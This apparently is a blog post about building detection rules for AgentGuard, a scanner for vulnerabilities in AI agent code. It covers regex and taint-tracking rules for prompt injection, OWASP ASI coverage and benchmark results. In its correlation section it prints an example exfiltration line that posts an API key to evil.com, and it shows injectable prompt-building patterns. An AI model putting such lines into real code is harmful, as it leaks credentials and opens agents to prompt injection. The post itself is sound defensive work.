Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities
When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?
Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into LLM context. The vulnerability isn't in a function call -- it's in how data is constructed.
The Regex Foundation
Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:
import re

# ASI01: Prompt Injection
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)
This catches the most common pattern: f-strings that interpolate values directly into a prompt-like assignment. It is blunt (it cannot tell trusted values from user input) but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.
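To make the rule concrete, here is a minimal sketch of how it might be applied line by line. The `scan_source` helper and the sample snippet are illustrative assumptions, not AgentGuard's actual API.

```python
import re

# Same rule as above, repeated so the sketch runs on its own.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)


def scan_source(source: str) -> list[int]:
    """Return 1-based line numbers where the rule matches (hypothetical helper)."""
    return [
        lineno
        for lineno, line in enumerate(source.splitlines(), start=1)
        if FSTRING_INJECTION.search(line)
    ]


# Hypothetical input: one prompt-like f-string and one unrelated f-string.
SAMPLE = '''role = "helper"
system_prompt = f"You are a {role}. The user said: {user_input}"
greeting = f"Hello {name}"
'''

print(scan_source(SAMPLE))
```

Only the second line is flagged. The third line is also an f-string, but its target name contains none of the rule's keywords, which is what keeps the rule from firing on every interpolated string in a codebase.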
The Problem with Regex
Regex has limits. Consider:
# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"
# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)
# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.
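The gap is easy to reproduce. The sketch below runs the f-string rule, on its own, against the three patterns; the `SAMPLES` dictionary and the `is_flagged` helper are assumptions made for this illustration.

```python
import re

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

# The three patterns from above, one list of source lines per pattern.
SAMPLES = {
    "A": ['prompt = f"You are a helper. {user_input}"'],
    "B": [
        'template = "You are a helper. {input}"',
        "prompt = template.format(input=user_data)",
    ],
    "C": [
        'messages = [{"role": "system", "content": config["system_prompt"] + user_message}]'
    ],
}


def is_flagged(lines: list[str]) -> bool:
    """True if any line of the snippet matches the f-string rule."""
    return any(FSTRING_INJECTION.search(line) for line in lines)


results = {name: is_flagged(lines) for name, lines in SAMPLES.items()}
print(results)
```

Only Pattern A matches. Separate regexes for .format() and concatenation can narrow the gap, but each one still inspects a single line and knows nothing about where the value came from.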
This is where AgentGuard is headed next: AST-based semantic analysis.
The AST Layer (Roadmap)
The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:
- Identify sources: function parameters named user_input, query, message, request.body
- Track propagation: variable assignments, string formatting, list/dict construction
- Identify sinks: openai.chat.completions.create, prompt, messages, system
- Flag paths: any path from source to sink without sanitization
This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
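The four steps can be sketched with Python's standard ast module. This is a deliberately small illustration of the idea, not AgentGuard's planned implementation: the source and sink names are a subset of the list above (request.body is omitted because it is an attribute, not a parameter name), `find_tainted_sinks` is a hypothetical function, and the sketch handles only straight-line function bodies with no sanitizer support.

```python
import ast

# Assumed source and sink names; a real rule set would be larger and configurable.
SOURCE_PARAMS = {"user_input", "query", "message"}
SINK_KEYWORDS = {"prompt", "messages", "system"}


def names_in(node: ast.AST) -> set[str]:
    """Collect every variable name referenced inside an expression."""
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def find_tainted_sinks(source: str) -> list[tuple[int, str]]:
    """Return (line, keyword) pairs where tainted data reaches a sink keyword.

    Simplified on purpose: top-level statements of each function only,
    no branches, no sanitizers, no cross-function flow.
    """
    findings = []
    for func in ast.walk(ast.parse(source)):
        if not isinstance(func, ast.FunctionDef):
            continue
        # Sources: parameters whose names suggest user-controlled input.
        tainted = {a.arg for a in func.args.args if a.arg in SOURCE_PARAMS}
        for stmt in func.body:
            # Sinks: any call that passes tainted data through a sink keyword.
            for call in ast.walk(stmt):
                if not isinstance(call, ast.Call):
                    continue
                for kw in call.keywords:
                    if kw.arg in SINK_KEYWORDS and names_in(kw.value) & tainted:
                        findings.append((call.lineno, kw.arg))
            # Propagation: a tainted right-hand side taints the assigned names.
            if isinstance(stmt, ast.Assign) and names_in(stmt.value) & tainted:
                for target in stmt.targets:
                    tainted |= names_in(target)
    return findings


# Hypothetical samples: Pattern B feeding a chat call, and a constant-only variant.
VULNERABLE = '''
def handle(user_input):
    template = "You are a helper. {input}"
    prompt = template.format(input=user_input)
    messages = [{"role": "system", "content": prompt}]
    return client.chat.completions.create(model="m", messages=messages)
'''

SAFE = '''
def handle(user_input):
    messages = [{"role": "system", "content": "You are a helper."}]
    return client.chat.completions.create(model="m", messages=messages)
'''

print(find_tainted_sinks(VULNERABLE))
print(find_tainted_sinks(SAFE))
```

The vulnerable sample is reported at its messages keyword even though no f-string appears anywhere, because taint is carried from the parameter through .format() and the list/dict literal. The safe sample produces no findings.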
Correlation Detection
AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):
# Line 1: Secret access
api_key = os.environ.get("API_KEY")
# Line 2: Network call
requests.post("https://evil.com/collect", headers={"Auth": api_key})
The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
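A minimal sketch of that adjacent-line check follows. The two regexes are simplified stand-ins chosen for this example, and `correlate` is a hypothetical name; AgentGuard's real patterns are likely broader.

```python
import re

# Assumed, simplified patterns for illustration only.
SECRET_ACCESS = re.compile(r"os\.environ|os\.getenv")
NETWORK_CALL = re.compile(r"requests\.(?:post|put)\(")


def correlate(source: str) -> list[int]:
    """Return 1-based line numbers N where line N reads a secret
    and line N+1 makes an outbound network call."""
    lines = source.splitlines()
    return [
        n + 1
        for n in range(len(lines) - 1)
        if SECRET_ACCESS.search(lines[n]) and NETWORK_CALL.search(lines[n + 1])
    ]


ADJACENT = (
    'api_key = os.environ.get("API_KEY")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)

SEPARATED = (
    'api_key = os.environ.get("API_KEY")\n'
    'log.info("starting")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)

print(correlate(ADJACENT))
print(correlate(SEPARATED))
```

The second sample shows the limitation: a single unrelated line between the secret read and the network call is enough to evade an N / N+1 rule.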
Future versions will extend this to full function-level taint tracking.
The OWASP ASI Top 10 Coverage
AgentGuard currently covers all 10 categories:
| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |
Benchmark Results
The benchmark suite has 28 samples, covering five of the ten categories plus a small set of clean code:
- ASI01 (6 samples): 100% detection
- ASI02 (5 samples): 100% detection
- ASI03 (4 samples): 100% detection
- ASI07 (6 samples): 100% detection
- ASI10 (5 samples): 100% detection
- Clean (2 samples): 0% false positives
What's Next
- AST-based taint tracking for Python and JavaScript
- Language support: Rust, Go, Java
- GitHub Code Scanning integration via SARIF
- MCP server mode for real-time scanning in AI coding assistants
- Semantic injection detection -- understanding prompt structure, not just string patterns
The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.
AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.